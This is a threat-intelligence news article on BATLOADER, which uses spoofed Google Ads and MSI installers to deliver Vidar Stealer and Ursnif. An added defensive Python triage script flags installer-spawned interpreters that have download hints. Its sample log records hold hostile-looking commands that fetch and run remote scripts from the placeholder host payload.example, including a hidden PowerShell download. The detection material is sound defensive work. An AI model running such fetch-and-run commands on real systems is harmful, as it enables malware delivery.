BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads

Mar 11, 2023, by Ravie Lakshmanan (Cyber Threat Intelligence)

The malware downloader known as BATLOADER has been observed abusing Google Ads to deliver secondary payloads such as Vidar Stealer and Ursnif.

According to cybersecurity company eSentire, the malicious ads are used to spoof a wide range of legitimate apps and services such as Adobe, OpenAI’s ChatGPT, Spotify, Tableau, and Zoom.

BATLOADER, as the name suggests, is a loader that is responsible for distributing next-stage malware such as information stealers, banking malware, Cobalt Strike, and even ransomware.

One of the key traits of BATLOADER operations is the use of software impersonation tactics for malware delivery.

This is achieved by setting up lookalike websites that host Windows installer files masquerading as legitimate apps. The infection sequence is triggered when a user searching for the software clicks a rogue ad on the Google search results page.

When launched, these MSI installer files execute Python scripts that contain the BATLOADER payload, which in turn retrieves the next-stage malware from a remote server.

This modus operandi marks a slight shift from the attack chains observed in December 2022, when the MSI installer packages were used to run PowerShell scripts to download the stealer malware.
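The two delivery chains described above share one observable on the endpoint: an MSI installer (msiexec.exe) spawning a script interpreter, either Python in the newer chain or PowerShell in the December 2022 one, with a command line that reaches out to a remote server. The following is an added illustration of how a defender might triage process-creation telemetry for that pattern; it is not code from eSentire or from the article. The log format, the field names, the `payload.example` URLs and every sample record are constructed for the example, and the choice of interpreter names is an assumption about what a typical Windows environment records.

```python
"""Flag installer-spawned script interpreters in process-creation logs.

Added example for the BATLOADER delivery chain: MSI installer ->
embedded Python (or, earlier, PowerShell) script -> download of a
next-stage payload. All records below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass

# Parent/child pairs worth a second look. msiexec.exe comes from the article;
# the interpreter names are an assumption about ordinary Windows hosts.
INSTALLER_PARENTS = {"msiexec.exe"}
SCRIPT_INTERPRETERS = {"python.exe", "pythonw.exe", "powershell.exe"}

# Command-line fragments that suggest the script is fetching something remote.
DOWNLOAD_HINTS = re.compile(
    r"https?://|Invoke-WebRequest|DownloadString|DownloadFile|urllib|urlretrieve",
    re.IGNORECASE,
)

# Constructed records in a simple 'key=value|key=value' layout modelled on the
# ParentImage / Image / CommandLine fields of a process-creation event.
SAMPLE_LINES = [
    # 1) MSI installer launches a bundled Python loader that pulls the next stage
    r"ts=2023-03-11T10:02:13Z|ParentImage=C:\Windows\System32\msiexec.exe|Image=C:\Users\alice\AppData\Local\Temp\VendorApp\python.exe|CommandLine=python.exe loader.py https://payload.example/stage2.bin",
    # 2) The older chain: MSI runs PowerShell to download the stealer
    r"ts=2023-03-11T10:05:41Z|ParentImage=C:\Windows\System32\msiexec.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -w hidden -c Invoke-WebRequest https://payload.example/s.ps1 -OutFile s.ps1",
    # 3) Benign: a developer running a build script from Explorer
    r"ts=2023-03-11T10:07:02Z|ParentImage=C:\Windows\explorer.exe|Image=C:\Python311\python.exe|CommandLine=python.exe build.py",
    # 4) Benign: msiexec spawning its own helper instance
    r"ts=2023-03-11T10:09:15Z|ParentImage=C:\Windows\System32\msiexec.exe|Image=C:\Windows\System32\msiexec.exe|CommandLine=msiexec.exe /V",
    # 5) Suspicious parent/child pair but no download hint: lower-confidence hit
    r"ts=2023-03-11T10:12:58Z|ParentImage=C:\Windows\System32\msiexec.exe|Image=C:\Program Files\VendorApp\python.exe|CommandLine=python.exe postinstall.py",
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_line(line: str) -> ProcessEvent:
    """Parse one constructed record. Split only on '|' that starts a new
    Key= field, so a PowerShell pipe inside CommandLine does not break parsing."""
    fields = {}
    for part in re.split(r"\|(?=\w+=)", line):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return ProcessEvent(
        fields.get("ParentImage", ""),
        fields.get("Image", ""),
        fields.get("CommandLine", ""),
    )


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def assess(event: ProcessEvent) -> list[str]:
    """Return the reasons an event is suspicious (empty list means benign)."""
    reasons = []
    parent, child = basename(event.parent_image), basename(event.image)
    if parent in INSTALLER_PARENTS and child in SCRIPT_INTERPRETERS:
        reasons.append(f"{parent} spawned {child}")
        if DOWNLOAD_HINTS.search(event.command_line):
            reasons.append("command line references a remote download")
    return reasons


def triage(lines) -> list[dict]:
    """Run every record through assess() and keep only the hits, in input order."""
    hits = []
    for line in lines:
        event = parse_line(line)
        reasons = assess(event)
        if reasons:
            hits.append({"image": event.image,
                         "command_line": event.command_line,
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LINES):
        print(hit["image"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

Records 1 and 2 produce two reasons each (installer-spawned interpreter plus a download indicator), record 5 produces one, and records 3 and 4 produce none. The two-tier output is deliberate: an installer running a post-install script is common enough that the parent/child pair alone warrants a look rather than an alert, while the same pair with a URL on the command line is the shape of the chain eSentire describes.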

Other BATLOADER samples analyzed by eSentire have also revealed added capabilities that allow the malware to establish entrenched access to enterprise networks.

“BATLOADER continues to see changes and improvement since it first emerged in 2022,” eSentire said.

“BATLOADER targets various popular applications for impersonation. This is no accident, as these applications are commonly found in business networks and thus, they would yield more valuable footholds for monetization via fraud or hands-on-keyboard intrusions.”
